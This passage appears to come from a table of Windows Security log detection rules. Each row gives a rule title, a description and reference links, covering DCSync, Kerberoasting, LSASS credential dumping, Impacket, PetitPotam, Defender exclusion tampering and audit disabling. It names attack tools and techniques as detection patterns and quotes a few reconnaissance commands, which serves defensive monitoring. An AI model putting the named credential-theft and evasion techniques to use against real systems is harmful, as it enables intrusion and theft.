https://twitter.com/gentilkiwi/status/1003236624925413376, https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2, https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662 |
Device Installation Blocked |
Detects an installation of a device that is forbidden by the system policy |
https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6423 |
Windows Event Auditing Disabled |
Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled.
This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed.
Also, it is recommended to turn off "Local Group Policy Object Processing" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as "gpedit.msc".
Please note, that disabling "Local Group Policy Object Processing" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways.
|
https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit |
Important Windows Event Auditing Disabled |
Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled. |
https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit, https://github.com/SigmaHQ/sigma/blob/master/documentation/logsource-guides/windows/service/security.md |
ETW Logging Disabled In .NET Processes - Registry |
Potential adversaries stopping ETW providers recording loaded .NET assemblies. |
https://twitter.com/_xpn_/status/1268712093928378368, https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr, https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables, https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38, https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39, https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_, https://bunnyinside.com/?term=f71e8cb9c76a, http://managed670.rssing.com/chan-5590147/all_p1.html, https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf |
DPAPI Domain Backup Key Extraction |
Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers |
https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html |
DPAPI Domain Master Key Backup Attempt |
Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller. |
https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html |
External Disk Drive Or USB Storage Device Was Recognized By The System |
Detects external disk drives or plugged-in USB devices. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6416 |
Persistence and Execution at Scale via GPO Scheduled Task |
Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale |
https://twitter.com/menasec1/status/1106899890377052160, https://www.secureworks.com/blog/ransomware-as-a-distraction, https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-0-16-1-scheduled-task-execution-at-scale-via-gpo.html |
Hidden Local User Creation |
Detects the creation of a local hidden user account which should not happen for event ID 4720. |
https://twitter.com/SBousseaden/status/1387743867663958021 |
HackTool - EDRSilencer Execution - Filter Added |
Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.
|
https://github.com/netero1010/EDRSilencer |
HackTool - NoFilter Execution |
Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators
|
https://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp, https://github.com/deepinstinct/NoFilter, https://www.deepinstinct.com/blog/nofilter-abusing-windows-filtering-platform-for-privilege-escalation, https://x.com/_st0pp3r_/status/1742203752361128162?s=20 |
HybridConnectionManager Service Installation |
Rule to detect the Hybrid Connection Manager service installation. |
https://twitter.com/Cyb3rWard0g/status/1381642789369286662 |
Impacket PsExec Execution |
Detects execution of Impacket's psexec.py. |
https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html |
Possible Impacket SecretDump Remote Activity |
Detect AD credential dumping using impacket secretdump HKTL |
https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html |
Invoke-Obfuscation CLIP+ Launcher - Security |
Detects Obfuscated use of Clip.exe to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Obfuscated IEX Invocation - Security |
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references |
https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 |
Invoke-Obfuscation STDIN+ Launcher - Security |
Detects Obfuscated use of stdin to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR+ Launcher - Security |
Detects Obfuscated use of Environment Variables to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation COMPRESS OBFUSCATION - Security |
Detects Obfuscated Powershell via COMPRESS OBFUSCATION |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation RUNDLL LAUNCHER - Security |
Detects Obfuscated Powershell via RUNDLL LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Stdin - Security |
Detects Obfuscated Powershell via Stdin in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Clip - Security |
Detects Obfuscated Powershell via use Clip.exe in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use MSHTA - Security |
Detects Obfuscated Powershell via use MSHTA in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Rundll32 - Security |
Detects Obfuscated Powershell via use Rundll32 in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security |
Detects Obfuscated Powershell via VAR++ LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
ISO Image Mounted |
Detects the mount of an ISO image on an endpoint |
https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore, https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages, https://twitter.com/MsftSecIntel/status/1257324139515269121, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image |
Kerberoasting Activity - Initial Query |
This rule will collect the data needed to start looking into possible kerberoasting activity.
Further analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds.
You can then set a threshold for the number of requests and time between the requests to turn this into an alert.
|
https://www.trustedsec.com/blog/art_of_kerberoast/, https://adsecurity.org/?p=3513 |
First Time Seen Remote Named Pipe |
This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes |
https://twitter.com/menasec1/status/1104489274387451904 |
LSASS Access From Non System Account |
Detects potential mimikatz-like tools accessing LSASS from non system account |
https://threathunterplaybook.com/hunts/windows/170105-LSASSMemoryReadAccess/notebook.html |
Credential Dumping Tools Service Execution - Security |
Detects well-known credential dumping tools execution via service execution events |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
WCE wceaux.dll Access |
Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host |
https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet |
Metasploit SMB Authentication |
Alerts on Metasploit host's authentications on the domain. |
https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb |
Metasploit Or Impacket Service Installation Via SMB PsExec |
Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation |
https://bczyz1.github.io/2021/01/30/psexec.html |
Meterpreter or Cobalt Strike Getsystem Service Installation - Security |
Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ |
NetNTLM Downgrade Attack |
Detects NetNTLM downgrade attack |
https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks |
Windows Network Access Suspicious desktop.ini Action |
Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. |
https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ |
New or Renamed User Account with '$' Character |
Detects the creation of a user with the "$" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms.
|
https://twitter.com/SBousseaden/status/1387743867663958021 |
Denied Access To Remote Desktop |
This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.
Often, this event can be generated by attackers when searching for available windows servers in the network.
|
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825 |
Password Policy Enumerated |
Detects when the password policy is enumerated. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4661, https://github.com/jpalanco/alienvault-ossim/blob/f74359c0c027e42560924b5cff25cdf121e5505a/os-sim/agent/src/ParserUtil.py#L951 |
Windows Pcap Drivers |
Detects Windows Pcap driver installation based on a list of associated .sys files. |
https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more |
Possible PetitPotam Coerce Authentication Attempt |
Detect PetitPotam coerced authentication activity. |
https://github.com/topotam/PetitPotam, https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml |
PetitPotam Suspicious Kerberos TGT Request |
Detect suspicious Kerberos TGT requests.
Once an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.
One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.
This request will generate a 4768 event with some unusual fields depending on the environment.
This analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.
|
https://github.com/topotam/PetitPotam, https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/, https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml |
Possible DC Shadow Attack |
Detects DCShadow via create new SPN |
https://twitter.com/gentilkiwi/status/1003236624925413376, https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2, https://web.archive.org/web/20180203014709/https://blog.alsid.eu/dcshadow-explained-4510f52fc19d?gi=c426ac876c48 |
PowerShell Scripts Installed as Services - Security |
Detects powershell script installed as a Service |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Protected Storage Service Access |
Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers |
https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html |
RDP over Reverse SSH Tunnel WFP |
Detects svchost hosting RDP termsvcs communicating with the loopback address |
https://twitter.com/SBousseaden/status/1096148422984384514, https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx |
Register new Logon Process by Rubeus |
Detects potential use of Rubeus via registered new trusted logon process |
https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1 |
Service Registry Key Read Access Request |
Detects "read access" requests on the services registry key.
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.
|
https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness |
Remote PowerShell Sessions Network Connections (WinRM) |
Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986 |
https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html |
Replay Attack Detected |
Detects possible Kerberos Replay Attack on the domain controllers when "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client |
https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4649 |
SAM Registry Hive Handle Request |
Detects handles requested to SAM registry hive |
https://threathunterplaybook.com/hunts/windows/190725-SAMRegistryHiveHandleRequest/notebook.html |
SCM Database Handle Failure |
Detects non-system users failing to get a handle of the SCM database. |
https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html |
SCM Database Privileged Operation |
Detects non-system users performing privileged operation os the SCM database |
https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html |
Potential Secure Deletion with SDelete |
Detects files that have extensions commonly seen while SDelete is used to wipe files. |
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm, https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://learn.microsoft.com/en-gb/sysinternals/downloads/sdelete |
Service Installed By Unusual Client - Security |
Detects a service installed by a client which has PID 0 or whose parent has PID 0 |
https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html, https://www.x86matthew.com/view_post?id=create_svc_rpc, https://twitter.com/SBousseaden/status/1490608838701166596 |
Remote Access Tool Services Have Been Installed - Security |
Detects service installation of different remote access tools software. These software are often abused by threat actors to perform |
https://redcanary.com/blog/misbehaving-rats/ |
SMB Create Remote File Admin Share |
Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$). |
https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml, https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file |
A New Trust Was Created To A Domain |
Addition of domains is seldom and should be verified for legitimacy. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4706 |
Win Susp Computer Name Containing Samtheadmin |
Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool |
https://twitter.com/malmoeb/status/1511760068743766026, https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py, https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py |
Addition of SID History to Active Directory Object |
An attacker can use the SID history attribute to gain additional privileges. |
https://adsecurity.org/?p=1772 |
Password Change on Directory Service Restore Mode (DSRM) Account |
Detects potential attempts made to set the Directory Services Restore Mode administrator password.
The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers.
Attackers may change the password in order to obtain persistence.
|
https://adsecurity.org/?p=1714, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4794 |
Account Tampering - Suspicious Failed Logon Reasons |
This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625, https://twitter.com/SBousseaden/status/1101431884540710913 |
Group Policy Abuse for Privilege Addition |
Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.
|
https://www.elastic.co/guide/en/security/current/group-policy-abuse-for-privilege-addition.html#_setup_275 |
Startup/Logon Script Added to Group Policy Object |
Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.
|
https://www.elastic.co/guide/en/security/current/startup-logon-script-added-to-group-policy-object.html |
Kerberos Manipulation |
Detects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4771 |
Suspicious LDAP-Attributes Used |
Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies. |
https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961, https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/, https://github.com/fox-it/LDAPFragger |
Suspicious Windows ANONYMOUS LOGON Local Account Created |
Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts. |
https://twitter.com/SBousseaden/status/1189469425482829824 |
Password Dumper Activity on LSASS |
Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN |
https://twitter.com/jackcr/status/807385668833968128 |
Suspicious Remote Logon with Explicit Credentials |
Detects suspicious processes logging on with explicit credentials |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view |
Potentially Suspicious AccessMask Requested From LSASS |
Detects process handle on LSASS process with certain access mask |
https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Reconnaissance Activity |
Detects activity as "net user administrator /domain" and "net group domain admins /domain" |
https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html |
Password Protected ZIP File Opened |
Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened. |
https://twitter.com/sbousseaden/status/1523383197513379841 |
Password Protected ZIP File Opened (Suspicious Filenames) |
Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened. |
https://twitter.com/sbousseaden/status/1523383197513379841 |
Password Protected ZIP File Opened (Email Attachment) |
Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened. |
https://twitter.com/sbousseaden/status/1523383197513379841 |
Uncommon Outbound Kerberos Connection - Security |
Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
|
https://github.com/GhostPack/Rubeus |
Possible Shadow Credentials Added |
Detects possible addition of shadow credentials to an active directory object. |
https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html, https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/, https://twitter.com/SBousseaden/status/1581300963650187264? |
Suspicious PsExec Execution |
detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one |
https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html |
Suspicious Access to Sensitive File Extensions |
Detects known sensitive file extensions accessed on a network share |
Internal Research |
Suspicious Kerberos RC4 Ticket Encryption |
Detects service ticket requests using RC4 encryption type |
https://adsecurity.org/?p=3458, https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity |
Suspicious Scheduled Task Creation |
Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698 |
Important Scheduled Task Deleted/Disabled |
Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4699, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4701 |
Suspicious Scheduled Task Update |
Detects update to a scheduled task event that contain suspicious keywords. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698 |
Unauthorized System Time Modification |
Detect scenarios where a potentially unauthorized application or user is modifying the system time. |
Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well), Live environment caused by malware, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4616 |
Remote Service Activity via SVCCTL Named Pipe |
Detects remote service activity via remote access to the svcctl named pipe |
https://web.archive.org/web/20230329155141/https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html |
SysKey Registry Keys Access |
Detects handle requests and access operations to specific registry keys to calculate the SysKey |
https://threathunterplaybook.com/hunts/windows/190625-RegKeyAccessSyskey/notebook.html |
Sysmon Channel Reference Deletion |
Potential threat actor tampering with Sysmon manifest and eventually disabling it |
https://twitter.com/Flangvik/status/1283054508084473861, https://twitter.com/SecurityJosh/status/1283027365770276866, https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html, https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8 |
Tap Driver Installation - Security |
Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.
|
https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers |
Suspicious Teams Application Related ObjectAcess Event |
Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. |
https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens |
Transferring Files with Credential Data via Network Shares |
Transferring files with well-known filenames (sensitive files with credential data) using network shares |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
User Added to Local Administrator Group |
Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732, https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers |
User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess' |
The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA. |
https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1 |
Local User Creation |
Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.
|
https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/ |
Potential Privileged System Service Operation - SeLoadDriverPrivilege |
Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.
With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.
This user right does not apply to Plug and Play device drivers.
If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.
This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.
|
https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4673 |
User Logoff Event |
Detects a user log-off activity. Could be used for example to correlate information during forensic investigations |
https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4634, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4647 |
VSSAudit Security Event Source Registration |
Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy |
Windows Defender Exclusion List Modified |
Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.
|
https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ |
Windows Defender Exclusion Deleted |
Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to delete their tracks by removing the added exclusions
|
https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ |
T1047 Wmiprvse Wbemcomn DLL Hijack |
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network for a WMI DLL Hijack scenario. |
https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html |
Locked Workstation |
Detects locked workstation session events that occur automatically after a standard period of inactivity. |
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800 |
WMI Persistence - Security |
Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. |
https://twitter.com/mattifestation/status/899646620148539397, https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ |
Windows Defender Exclusion Registry Key - Write Access Requested |
Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.
|
https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ |
Admin User Remote Logon |
Detect remote login by Administrator user (depending on internal pattern). |
https://car.mitre.org/wiki/CAR-2016-04-005 |
DiagTrackEoP Default Login Username |
Detects the default "UserName" used by the DiagTrackEoP POC |
https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46 |
A Member Was Removed From a Security-Enabled Global Group |
Detects activity when a member is removed from a security-enabled global group |
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633 |
Potential Access Token Abuse |
Detects potential token impersonation and theft. Example, when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS flag". |
https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation, https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html |
RDP Login from Localhost |
RDP login with localhost source address may be a tunnelled login |
https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html |
Successful Overpass the Hash Attempt |
Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module. |
https://web.archive.org/web/20220419045003/https://cyberwardog.blogspot.com/2017/04/chronicles-of-threat-hunter-hunting-for.html |
Scanner PoC for CVE-2019-0708 RDP RCE Vuln |
Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep |
https://twitter.com/AdamTheAnalyst/status/1134394070045003776, https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708 |
A Member Was Added to a Security-Enabled Global Group |
Detects activity when a member is added to a security-enabled global group |
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632 |
A Security-Enabled Global Group Was Deleted |
Detects activity when a security-enabled global group is deleted |
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634 |
External Remote RDP Logon from Public IP |
